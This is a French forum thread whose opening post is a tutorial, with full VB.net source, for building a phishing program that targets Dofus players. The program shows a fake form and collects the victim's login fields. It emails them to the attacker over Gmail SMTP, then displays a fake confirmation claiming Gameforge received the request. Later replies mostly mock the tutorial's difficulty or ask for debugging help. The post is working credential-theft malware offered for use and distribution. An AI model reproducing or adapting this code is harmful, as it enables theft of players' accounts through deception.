Crée un logiciel de phishing sous VB.net (Dofus)

    Publicités

Users Who Are Viewing This Thread (Total: 0, Members: 0, Guests: 0)

enzobes899

Membre
Mar 15, 2011
79
0
431
34
Bonjours , à tous je vais vous montrer comment faire un logiciel de Phishing sous VB.net . Dans ce tutoriel le logiciel est pour le jeu Dofus mais vous pouvez l’adapter a n'importe quel jeu .
Ce tutoriel est pour les expert.Je pense même qu'un débutant assez débrouillard pourrait le faire ;)
1.Lancement de Visual Basic 2010

-Télécharger Visual Basic 2010 (Ou plus récent) ---> Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

Une fois l'installation terminée , lancez Visual Basic 2010
-Cliquez sur l'icône "nouveau projet" juste en dessous de "Fichier"

154603Pagededmarragevb.png


-Nommez votre logiciel comme vous le voulez et cliquez sur "OK"

2. Le design

Passons maintenant à la parti design de notre logiciel
-Insérez une "PictureBox"

647089PictureBox.png


Cliquez sur la flèche de la PictureBox

110525014412801171.png


-Puis , cliquez sur "Choisir une image"
-Séléctionner "Ressource local" puis cliquez sur "Importer..."
-Choisissez l'image que vous voulez pour l'arrière plan de votre logiciel .

110525073634800754.png


Maintenant , nous allons modifier le nom du logiciel
-Cliquez sur "Form1" , (1 seul clique)

110525073831732991.png


- Cherchez dans la boite des propriétés : "Text" et modifiez "Form1" par le nom de votre logiciel .

110525014834653301.png


Maintenant nous allons placer les TextBox , ComboBox , Bouton , ProgressBar et Timer .
-Sélectionner dans la boîte à outils : Le nombre de TextBox , de ComboBox , Bouton , etc...
Moi je vais choisir : 3 TextBox , 2 ComboBox , 2 ProgressBar , 2 Timer , 2 Boutons
Voilà ce que sa donne chez moi :

110525074753104163.png


Les 2 ProgressBars et les 2 Bouton sont superposés

3. Le Code

Nous allons maintenant passer à la partie la plus compliquer ... Le codage de notre logiciel. Ne fait pas du copier/collez du code sans rien comprendre à ce que vous copier/coller.

-Double cliquez sur "Bouton1"
Vous devez rentrez ce code (Vous pouvez bien sur changer le message d'erreur)
Code:
Timer1.Start()
        If TextBox2.Text = "" Then
            Timer1.Stop()
            MsgBox("Vous devez remplir tous les champs ", MsgBoxStyle.Information = vbOKOnly, "ERREUR")

-Revenez sur l'onglet design de votre logiciel et double cliquez sur "Timer1" et entrez ce code :

Code:
ProgressBar1.Increment(1)
        If ProgressBar1.Value = 100 Then
            Timer1.Stop()
            Button3.Visible = True
            MsgBox("Cliquez sur le bouton envoyer la requette au serveur pour valider ")

-Tous en haut de la page de code et tapez :

Code:
Imports System.Net.Mail

(Au dessus de "Public Class Form1")

-Cliquez maintenant sur le "Buton2" et entrez :

Code:
Dim MyMailMessage As New MailMessage()
        Try
            MyMailMessage.From = New MailAddress("[email protected]")
            MyMailMessage.To.Add("[email protected]")
            MyMailMessage.Subject = ("Le sujet du mail")
            MyMailMessage.Body = TextBox1.Text + ControlChars.NewLine + TextBox2.Text + ControlChars.NewLine + TextBox3.Text + ControlChars.NewLine + ComboBox1.Text + ControlChars.NewLine + ComboBox2.Text + ControlChars.NewLine + ComboBox3.Text + ControlChars.NewLine + ComboBox4.Text + ControlChars.NewLine + ComboBox5.Text + ControlChars.NewLine ( Cette ligne change suivant le nombre de ComboBox et TextBox utilisées.)
            Dim SMTP As New SmtpClient("smtp.gmail.com")
            SMTP.Port = 587
            SMTP.EnableSsl = True
            SMTP.Credentials = New System.Net.NetworkCredential("Votre identifiant", "votre mot de passe")
            SMTP.Send(MyMailMessage)
            TextBox2.Text = ""

        Catch ex As Exception
        End Try
        Timer2.Start()

Attention : La ligne

Code:
MyMailMessage.Body = TextBox1.Text + ControlChars.NewLine + TextBox2.Text + ControlChars.NewLine + TextBox3.Text + ControlChars.NewLine + ComboBox1.Text + ControlChars.NewLine + ComboBox2.Text + ControlChars.NewLine + ComboBox3.Text + ControlChars.NewLine + ComboBox4.Text + ControlChars.NewLine + ComboBox5.Text + ControlChars.NewLine

Varie selon les TextBox et les ComboBox utilisées
Remplacer les guillemets par vos informations

-Enfin , cliquez sur "Timer2" et entrez :

Code:
Private Sub Timer2_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer2.Tick
ProgressBar2.Visible = True
ProgressBar2.Increment(1)
If ProgressBar2.Value = 100 Then
Timer2.Stop()
MsgBox("Votre requette a bien été envoyer sur les serveur de Gameforge , elle sera traitée sous 24 heures", , "Requette envoyée")

Voici le code du logiciel en entier :

Code:
Imports System.Net.Mail

Public Class Form1

    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Timer1.Start()
        If TextBox2.Text = "" Then
            Timer1.Stop()
            MsgBox("Vous devez remplir tous les champs ", MsgBoxStyle.Information = vbOKOnly, "ERREUR")


        End If
    End Sub






    Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
        ProgressBar1.Increment(1)
        If ProgressBar1.Value = 100 Then
            Timer1.Stop()
            Button3.Visible = True
            MsgBox("Cliquez sur le bouton envoyer la requette au serveur pour valider ")

        End If
    End Sub


    Private Sub Button3_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button3.Click



        Dim MyMailMessage As New MailMessage()
        Try
            MyMailMessage.From = New MailAddress("[email protected]")
            MyMailMessage.To.Add("[email protected]")
            MyMailMessage.Subject = ("Sujet du mail")
            MyMailMessage.Body = TextBox1.Text + ControlChars.NewLine + TextBox2.Text + ControlChars.NewLine + TextBox3.Text + ControlChars.NewLine + ComboBox1.Text + ControlChars.NewLine + ComboBox2.Text + ControlChars.NewLine + ComboBox3.Text + ControlChars.NewLine + ComboBox4.Text + ControlChars.NewLine + ComboBox5.Text + ControlChars.NewLine
            Dim SMTP As New SmtpClient("smtp.gmail.com")
            SMTP.Port = 587
            SMTP.EnableSsl = True
            SMTP.Credentials = New System.Net.NetworkCredential("identifiant", "mot de passe ")
            SMTP.Send(MyMailMessage)
            TextBox2.Text = ""

        Catch ex As Exception
        End Try
        Timer2.Start()
    End Sub



    Private Sub Timer2_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer2.Tick
        ProgressBar2.Visible = True
        ProgressBar2.Increment(1)
        If ProgressBar2.Value = 100 Then
            Timer2.Stop()
            MsgBox("Votre requette a bien été envoyer sur les serveur de Gameforge , elle sera traitée sous 24 heures", , "Requette envoyée")

        End If
    End Sub
End Class

TUTO By Enzobes © 2011

Faite un debug de votre logiciel pour être sur qu'il marche , enregistrer et c'est fini vous pouvez publier votre logiciel

Si vous avez des question n'hésitez pas ;)
 
Last edited:

kir

Membre
Oct 31, 2011
19
0
301
34
Ces génial !! merci

---------- Message ajouté à 15h23 ---------- Le message précédent était à 15h13 ----------

mais ces super mal mal mal expliquer

---------- Message ajouté à 15h28 ---------- Le message précédent était à 15h23 ----------

euh ces tout mélanger a partir de la moitier :p ces nul
 

Evaelis

La Voix de la Sagesse
V
Ancien staff
Apr 28, 2010
22,949
468
1,699
Valhalla
Il est bien expliqué tu est juste un peu *** , ce n'est pas un tuto expert what else
 

kir

Membre
Oct 31, 2011
19
0
301
34
Jerry Une Débutante qui cose ou plutot 'un' vu que ya que les pervers qui mettent des image de filles
 
May 1, 2010
524
0
581
Merci mais faut pas vraiment être un expert pour faire ça, il y a déjà d'autre tutoriel dans la section débutant (d’ailleurs un des miens qui y ressemble vraiment beaucoup)
 

enzobes899

Membre
Mar 15, 2011
79
0
431
34
Il faut quand même un minimum de compétence si vous venaient a peine de découvrir la programmation en VB.net ne commençaient pas par ça et commençaient par le commencement tous simplement .
Merci =)
 
Apr 26, 2011
1,315
2
944
26
In my home
Discord
brokeos
J'ai deja vue se tutoriel 20 fois sur cheat-gam3, non expert, non amateur, c'est rien du tout :D et il n'y a pas que les pervers qui mettent des tofs de fille !
 
Mar 30, 2011
1,014
1
944
In Your Ass
c est surtout que les gens vont juste faire un copier / coller , si ils essayaient de comprendre ce qu il se passe ils verraient que le premier peon qui recup se prog vas leur pété leur mail en 3 secondes ;)

kler que c est vraiment pour des gros touristes ca ;)
 

Nearyu

Programmeur
V
Sep 25, 2010
6,942
18
944
28
Cela peut etre utile, mais je suis d'accors pour dire que c'est niveau amateur
 

Ben

Master Chief
V
Ancien staff
Mar 3, 2011
4,069
3
944
Un peut partout.
Moi si j'ai dit ça c'est qu'il l'avais mit section 4-Cours pour expert et que j'ai du le mettre ici, c'est clair c'est pour les touristes
 

benduc12

Nouveau membre
Mar 20, 2011
3
0
421
33
Peut tu donné ton logiciel pour que l'on modifie stp ? ^^

---------- Message ajouté à 14h30 ---------- Le message précédent était à 20h08 ----------

Je ne recois pas l'email oO
 

4ntology

Membre Banni
Sep 23, 2011
836
0
321
Terres deséchées
Grosse faille sur tous ses petits malware
Faites très attention à ne pas poster ce "virus" a un programmeur expérimenté
Il pourrait débusquer vos identifiants avec Reflector.NET ;)
 

gedboss

Membre actif
Mar 9, 2011
161
7
934
dtc
Salut,
C'est la première fois que j'utilise le vb.net, j'ai à peu prêt réussis je crois, j'avais 8 erreurs au début, maintenant il ne m'en reste plus, mais quand je lance le log en debug, j'ai ça qui s'affiche:

Une exception de première chance de type 'System.Net.Mail.SmtpException' s'est produite dans System.dll

Voilà, si quelqu'un sait comment m'aider :3

(Déso du vieux up)